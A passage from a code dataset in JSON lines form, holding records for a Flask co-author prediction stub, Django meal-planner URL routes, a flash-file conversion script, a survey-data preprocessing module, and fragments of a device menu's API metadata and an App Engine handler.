"self.configparser", "line_number": 534, "usage_type": "name"}, {"api_name": "self.configparser.led_setting_index", "line_number": 537, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 537, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 540, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 540, "usage_type": "name"}, {"api_name": 
"self.configparser.led_client.set_enabled", "line_number": 541, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 541, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 541, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 541, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 544, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 544, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 544, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 547, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 547, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 547, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 550, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 550, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 550, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 553, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 553, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 553, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_all", "line_number": 556, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 556, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 556, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 559, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 559, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 560, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 560, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 560, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 560, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client.rainbow", "line_number": 561, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 561, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 561, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 564, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 564, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 565, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 565, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 565, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 565, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client.blank", "line_number": 566, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 566, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 566, "usage_type": "name"}, {"api_name": "self.configparser.led_client.blank", "line_number": 569, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 569, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 569, "usage_type": "name"}, 
{"api_name": "self.configparser.led_enabled", "line_number": 570, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 570, "usage_type": "name"}, {"api_name": "self.configparser.led_client.set_enabled", "line_number": 571, "usage_type": "call"}, {"api_name": "self.configparser.led_client", "line_number": 571, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 571, "usage_type": "name"}, {"api_name": "self.configparser.led_enabled", "line_number": 571, "usage_type": "attribute"}, {"api_name": "self.configparser.menu", "line_number": 579, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 579, "usage_type": "name"}, {"api_name": "self.configparser.led_setting_index", "line_number": 580, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 580, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 581, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 581, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 584, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 584, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 584, "usage_type": "attribute"}, {"api_name": "self.configparser.channel", "line_number": 585, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 585, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 586, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 586, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 588, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 588, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 589, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 589, "usage_type": "name"}, {"api_name": "self.configparser.show_software_version", "line_number": 591, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 591, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 593, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 593, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 595, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 595, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 596, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 596, "usage_type": "name"}, {"api_name": "self.configparser.chin", "line_number": 597, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 597, "usage_type": "name"}, {"api_name": "self.configparser.show_software_version", "line_number": 599, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 599, "usage_type": "name"}, {"api_name": "self.configparser.dev_remaining", "line_number": 601, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 601, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 602, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 602, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 606, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 606, "usage_type": "name"}, {"api_name": 
"self.configparser.set_current_menu", "line_number": 607, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 607, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 611, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 611, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 614, "usage_type": "call"}, {"api_name": "subprocess.CalledProcessError", "line_number": 617, "usage_type": "attribute"}, {"api_name": "self.configparser.device.get_installed_package_version", "line_number": 621, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 621, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 621, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 622, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 622, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 623, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 623, "usage_type": "name"}, {"api_name": "self.configparser.channel_update", "line_number": 623, "usage_type": "attribute"}, {"api_name": "self.configparser.render", "line_number": 624, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 624, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 627, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 627, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 628, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 628, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 629, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 629, "usage_type": "name"}, {"api_name": "self.configparser.channel", "line_number": 630, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 630, "usage_type": "name"}, {"api_name": "self.configparser.device.software_update_blocking", "line_number": 631, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 631, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 631, "usage_type": "name"}, {"api_name": "self.configparser.lcd", "line_number": 631, "usage_type": "attribute"}, {"api_name": "self.configparser.led_client", "line_number": 631, "usage_type": "attribute"}, {"api_name": "self.configparser.device.software_update_from_git", "line_number": 633, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 633, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 633, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 634, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 634, "usage_type": "name"}, {"api_name": "self.configparser.show_software_version", "line_number": 635, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 635, "usage_type": "name"}, {"api_name": "self.configparser.display_active", "line_number": 638, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 638, "usage_type": "name"}, {"api_name": "self.configparser.device.generate_new_config", "line_number": 641, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 641, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 641, "usage_type": "name"}, 
{"api_name": "self.configparser.config.read", "line_number": 642, "usage_type": "call"}, {"api_name": "self.configparser.config", "line_number": 642, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 642, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 643, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 643, "usage_type": "name"}, {"api_name": "self.configparser.show_claim_info", "line_number": 644, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 644, "usage_type": "name"}, {"api_name": "self.configparser.lcd.long_text", "line_number": 647, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 647, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 647, "usage_type": "name"}, {"api_name": "self.configparser.device.is_service_active", "line_number": 649, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 649, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 649, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 651, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 651, "usage_type": "name"}, {"api_name": "self.configparser.device.generate_ssh_host_keys", "line_number": 652, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 652, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 652, "usage_type": "name"}, {"api_name": "self.configparser.device.set_sshd_service", "line_number": 653, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 653, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 653, "usage_type": "name"}, {"api_name": "self.configparser.device.is_service_active", "line_number": 654, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 654, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 654, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 655, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 655, "usage_type": "name"}, {"api_name": "self.configparser.lcd.long_text", "line_number": 658, "usage_type": "call"}, {"api_name": "self.configparser.lcd", "line_number": 658, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 658, "usage_type": "name"}, {"api_name": "self.configparser.device.is_remote_session_running", "line_number": 659, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 659, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 659, "usage_type": "name"}, {"api_name": "self.configparser.device.is_service_active", "line_number": 661, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 661, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 661, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 663, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 663, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 664, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 664, "usage_type": "name"}, {"api_name": "self.configparser.device.generate_ssh_host_keys", "line_number": 665, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 665, "usage_type": 
"attribute"}, {"api_name": "self.configparser", "line_number": 665, "usage_type": "name"}, {"api_name": "self.configparser.device.set_sshd_service", "line_number": 666, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 666, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 666, "usage_type": "name"}, {"api_name": "self.configparser.device.set_remote_ssh_session", "line_number": 670, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 670, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 670, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 675, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 675, "usage_type": "name"}, {"api_name": "self.configparser.menu", "line_number": 676, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 676, "usage_type": "name"}, {"api_name": "self.configparser.device.set_sshd_service", "line_number": 677, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 677, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 677, "usage_type": "name"}, {"api_name": "self.configparser.device.set_remote_ssh_session", "line_number": 679, "usage_type": "call"}, {"api_name": "self.configparser.device", "line_number": 679, "usage_type": "attribute"}, {"api_name": "self.configparser", "line_number": 679, "usage_type": "name"}, {"api_name": "self.configparser.render", "line_number": 681, "usage_type": "call"}, {"api_name": "self.configparser", "line_number": 681, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 755, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 782, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 784, "usage_type": "call"}]} +{"seq_id": "22351124965", "text": "from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/')\ndef predict_coauthors():\n author_id = request.args.get('id')\n # Use your model to predict co-authors for the given author_id\n # For simplicity, we'll use dummy data here\n results = [\n {\"authorID\": \"some_author_1\", \"likeliness\": 1, \"rank\": 1},\n {\"authorID\": \"some_author_2\", \"likeliness\": 1, \"rank\": 2},\n {\"authorID\": \"some_author_3\", \"likeliness\": 1, \"rank\": 3}\n ]\n return jsonify(results)\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "bkrupam/author", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 7, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "2047252362", "text": "from django.conf.urls.defaults import *\nfrom django.views.generic.list_detail import object_list, object_detail\nfrom django.views.generic.create_update import create_object, update_object, delete_object\n\n\nfrom mealweek.models import Week\nfrom mealweek.forms import WeekForm\n\nurlpatterns = patterns('',\n\n\n url(r'^$',\n object_list,\n { 'queryset': Week.objects.all(),\n 'paginate_by': 20 },\n name='mealweek_week_list'),\n\n 
url(r'^create/$',\n        create_object,\n        { 'form_class': WeekForm,\n          'extra_context': {'operation': 'create'},\n        },\n        name='mealweek_week_create'),\n\n    url(r'^(?P<slug>[-\w]+)/$',\n        object_detail,\n        { 'queryset': Week.objects.all()},\n        name='mealweek_week_detail'),\n\n    url(r'^delete/(?P<slug>[-\w]+)/$',\n        delete_object,\n        { 'model': Week,\n          'post_delete_redirect': '/schedule/weeks/',\n        },\n        name='mealweek_week_delete'),\n\n\n)\n", "repo_name": "davemckenna01/mealplanner", "sub_path": "apps/mealweek/urls/weeks.py", "file_name": "weeks.py", "file_ext": "py", "file_size_in_byte": 1383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.views.generic.list_detail.object_list", "line_number": 13, "usage_type": "argument"}, {"api_name": "mealweek.models.Week.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "mealweek.models.Week.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "mealweek.models.Week", "line_number": 14, "usage_type": "name"}, {"api_name": "django.views.generic.create_update.create_object", "line_number": 19, "usage_type": "argument"}, {"api_name": "mealweek.forms.WeekForm", "line_number": 20, "usage_type": "name"}, {"api_name": "django.views.generic.list_detail.object_detail", "line_number": 26, "usage_type": "argument"}, {"api_name": "mealweek.models.Week.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "mealweek.models.Week.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "mealweek.models.Week", "line_number": 27, "usage_type": "name"}, {"api_name": "django.views.generic.create_update.delete_object", "line_number": 31, "usage_type": "argument"}, {"api_name": "mealweek.models.Week", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "22662088785", "text": "import os\nimport shutil\nimport subprocess\nimport configparser\nfrom time import sleep\n\n# Initialize configParser # \nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\n# All Paths #\nRawFlashDir = config[\"Default\"][\"flashpath\"] + \"\\\\07_0x805EC000_PFlash.bin\"\nS19inDir = config[\"Default\"][\"s19inpath\"]\nS19outDir = config[\"Default\"][\"s19outpath\"]\nLifRootDir = config[\"Default\"][\"lifrootdir\"]\n\n# delete all files in folder which are not \"bin2s19.cmd\"\nfor file in os.listdir(S19inDir):\n    print(file)\n    if file != \"bin2s19.cmd\":\n        os.remove(f\"{S19inDir}\\\\{file}\")\n\nshutil.copy(RawFlashDir,S19inDir)                                       # copy raw flash file to S19in folder\nos.chdir(S19inDir)                                                      # change to S19in folder\nos.startfile(\"bin2s19.cmd\")                                             # start first step \nos.chdir(LifRootDir)                                                    # change to Lif root folder\nsleep(0.2)\nos.startfile(\"s19lifalign.cmd\")                                         # start second step \nsleep(0.3)\nshutil.move(S19outDir + \"\\\\07_0x805ec000_pflash_aligned.s19\", S19inDir) # Cut aligned file and put it into S19in folder\nos.chdir(S19inDir)                                                      # change to S19in folder\nos.remove(S19inDir + \"\\\\07_0x805EC000_PFlash.bin\")                      # remove unnecessary file\nos.remove(S19inDir + \"\\\\07_0x805EC000_PFlash.s19\")                      # remove unnecessary file\nos.chdir(LifRootDir)                                                    # change to Lif root folder to start eval cmd\nos.startfile(\"s19lifeval.cmd\")                                          # start third step\n\n", "repo_name": "129marci129/VT_FlashFileMovingNew", "sub_path": "mover.py", "file_name": "mover.py", "file_ext": "py", "file_size_in_byte": 1384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 8,
"usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 23, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 28, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 30, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 33, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 34, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "10128962019", "text": "import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import OneHotEncoder\r\n\r\ndef map_income(income):\r\n if(income == \"under $25,000\"):\r\n return 0\r\n elif(income == \"$25,001 - $50,000\"):\r\n return 1\r\n elif(income == \"$50,000 - $74,999\"):\r\n return 2\r\n elif(income == \"$75,000 - $100,000\"):\r\n return 3\r\n elif(income == \"$100,001 - $150,000\"):\r\n return 4\r\n elif(income == \"over $150,000\"):\r\n return 5\r\n\r\ndef map_education(edu):\r\n if(edu == \"Current K-12\"):\r\n return 0\r\n elif(edu == \"High School Diploma\"):\r\n return 1\r\n elif(edu == \"Associate's Degree\"):\r\n return 2\r\n elif(edu == \"Current Undergraduate\"):\r\n return 3\r\n elif(edu == \"Bachelor's Degree\"):\r\n return 4 \r\n elif(edu == \"Master's Degree\"):\r\n return 5\r\n elif(edu == \"Doctoral Degree\"):\r\n return 6\r\n\r\n\r\ndef transform(filename):\r\n \"\"\" preprocess the training data\"\"\"\r\n \"\"\" your code here \"\"\"\r\n df = pd.read_csv(filename)\r\n\r\n # Map Income\r\n df['Income'] = df['Income'].map(map_income, na_action='ignore')\r\n\r\n # Map EducationLevel\r\n df['EducationLevel'] = df['EducationLevel'].map(map_education, na_action='ignore')\r\n \r\n # Map Other Attributes\r\n for col_name, values in df.iteritems():\r\n #print('{name}: {value}'.format(name=name, value=values[0]))\r\n if(col_name in [\"UserID\", \"YOB\", \"Income\", \"EducationLevel\", \"Happy\", \"votes\"]):\r\n continue\r\n else:\r\n unique_value_list = df[col_name].unique()\r\n unique_value_list = [value for value in unique_value_list if not pd.isnull(value)]\r\n unique_value_list = sorted(unique_value_list)\r\n num_unique_value = len(unique_value_list)\r\n tmp_dict={}\r\n i=0\r\n for value in unique_value_list:\r\n if(pd.isnull(value)):\r\n continue\r\n else:\r\n tmp_dict[value] = i\r\n i += 1\r\n df[col_name] = df[col_name].map(tmp_dict,na_action='ignore')\r\n\r\n return {'data':df.as_matrix(),'target':df[\"Happy\"].as_matrix()} \r\n\r\ndef getMean(col):\r\n col_sum = np.sum(np.nan_to_num(col))\r\n col_count = np.sum(np.isnan(col))\r\n if col_count != 0:\r\n return 1.0*col_sum/col_count\r\n else:\r\n return 0\r\n\r\ndef getMedian(col):\r\n if col.shape[0] <= 0:\r\n return 0\r\n else:\r\n col=col[~np.isnan(col)]\r\n return np.median(col)\r\n\r\ndef getMostFrequent(col):\r\n col=col[~np.isnan(col)]\r\n if col.shape[0] <= 0:\r\n return 0\r\n # Count and record occurance of all the values\r\n counter = 
dict()\r\n    for entry in col:\r\n        if entry not in counter.keys():\r\n            counter[entry] = 1\r\n        else:\r\n            counter[entry] += 1\r\n    # Find the most frequent value\r\n    vals = counter.keys()\r\n    occur = 0\r\n    fre_val = 0\r\n    for val in vals:\r\n        if counter[val] > occur:\r\n            fre_val = val\r\n            occur = counter[val]\r\n    return fre_val\r\n\r\n\r\ndef fill_missing(X, strategy, isClassified):\r\n    \"\"\"\r\n    @X: input matrix with missing data filled by nan\r\n    @strategy: string, 'median', 'mean', 'most_frequent'\r\n    @isClassified: boolean value, if isClassified == true, then you need to build a\r\n    decision tree to classify users into different classes and use the\r\n    median/mean/mode values of different classes to fill in the missing data;\r\n    otherwise, just take the median/mean/most_frequent values of input data to\r\n    fill in the missing data\r\n    \"\"\"\r\n    \r\n    \r\n    # delete the HAPPY & VOTES column:\r\n    X = np.delete(X,7,1)\r\n    #X = np.delete(X,X.shape[1]-1,1)\r\n    (n, m) = X.shape\r\n    \r\n    if isClassified == False:\r\n        discarded_rows = []\r\n        for i in range(1,m):\r\n            col = X[:,i]\r\n            # Self-defined strategy for filling missing data:\r\n            # Mean: year of born\r\n            if i == 1:\r\n                sub_val = getMean(col)\r\n            # Median: income, education level\r\n            elif i == 3 or i == 5:\r\n                sub_val = getMedian(col)\r\n            # Most Frequent Value: other uncompared labels\r\n            else:\r\n                sub_val = getMostFrequent(col)\r\n\r\n            row_id = np.where(np.isnan(X[:,i]))\r\n            X[row_id,i] = sub_val\r\n\r\n    else:\r\n        gender_col_index = 2\r\n        edu_col_index = 5\r\n        edu_max = max(X[:,edu_col_index])\r\n        \r\n        # delete data with no gender or no education info:\r\n        discarded_rows = np.union1d(np.where(np.isnan(X[:,gender_col_index]))[0],np.where(np.isnan(X[:,edu_col_index]))[0])\r\n        \r\n        X = np.delete(X,np.where(np.isnan(X[:,gender_col_index])),0)\r\n        X = np.delete(X,np.where(np.isnan(X[:,edu_col_index])),0)\r\n        \r\n        \r\n        for i in range(1,m):\r\n            \r\n            if i == gender_col_index or i == edu_col_index:\r\n                continue\r\n            \r\n            col = X[:,i]\r\n            for gen in range(2):\r\n                for edu in range(int(edu_max)+1):\r\n                    # Get the indexes of instances belonging to a specific sub-classes:\r\n                    gen_indexes = np.where(X[:,gender_col_index] == gen)\r\n                    edu_indexes = np.where(X[:,edu_col_index] == edu)\r\n                    indexes = np.intersect1d(gen_indexes,edu_indexes)\r\n                    \r\n                    sub_col = col[indexes]\r\n                    # Self-defined strategy for filling missing data:\r\n                    # Mean: year of born\r\n                    if i == 1:\r\n                        sub_val = getMean(sub_col)\r\n                    # Median: income, education level\r\n                    elif i == 3 or i == 5:\r\n                        sub_val = getMedian(sub_col)\r\n                    # Most Frequent Value: other uncompared labels\r\n                    else:\r\n                        sub_val = getMostFrequent(sub_col)\r\n                    \r\n\r\n                    all_nan_indexes = np.where(np.isnan(X[:,i]))\r\n                    sub_nan_indexes = np.intersect1d(all_nan_indexes,indexes)\r\n                    #print X[sub_nan_indexes,i]\r\n                    X[sub_nan_indexes,i] = sub_val\r\n                    #print X[sub_nan_indexes,i]\r\n\r\n    for i in range(m):\r\n        col = X[:,i]\r\n        if np.sum(np.isnan(col)) > 0:\r\n            print(\"Column {0} has nan values!\".format(i))\r\n\r\n    X = X.astype(int)\r\n\r\n    # Do one-hot encoding on uncomparable attributes:\r\n    hold_col_index = 4\r\n    party_col_index = 6\r\n\r\n    append_col_set = np.concatenate(([party_col_index],[hold_col_index]))\r\n    #print append_col_set\r\n\r\n    for col_index in append_col_set:\r\n        enc = OneHotEncoder()\r\n        enc.fit(X[:,col_index:col_index+1])\r\n        new_cols = enc.transform(X[:,col_index:col_index+1]).toarray()\r\n        #print X[:10,:8]\r\n        X = np.delete(X,col_index,axis=1)\r\n        #print X.shape\r\n        #print new_cols.shape\r\n        X = 
np.insert(X,[col_index],new_cols,axis=1)\r\n #print X[:10,:14]\r\n\r\n\r\n return X,discarded_rows\r\n", "repo_name": "LilyLidl/What-Makes-People-Happy", "sub_path": "preprocess.py", "file_name": "preprocess.py", "file_ext": "py", "file_size_in_byte": 7070, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.union1d", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 207, "usage_type": "call"}]} +{"seq_id": "11725299391", "text": "from __future__ import (\n division,\n absolute_import,\n division,\n generators,\n nested_scopes,\n print_function,\n with_statement\n)\n\nimport os\nimport json\nimport urllib\nimport base64\nimport hashlib\nimport logging\nfrom operator import itemgetter\n\n# google appengine imports\nimport webapp2\nfrom google.appengine.api import mail\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\nfrom google.appengine.api import urlfetch\nfrom google.appengine.ext.webapp import template\n\n# for debugging exceptions\nimport sys\nimport traceback\n\n# application specific\nfrom module_utils import get_hardware_data, get_module_data\n\n# 
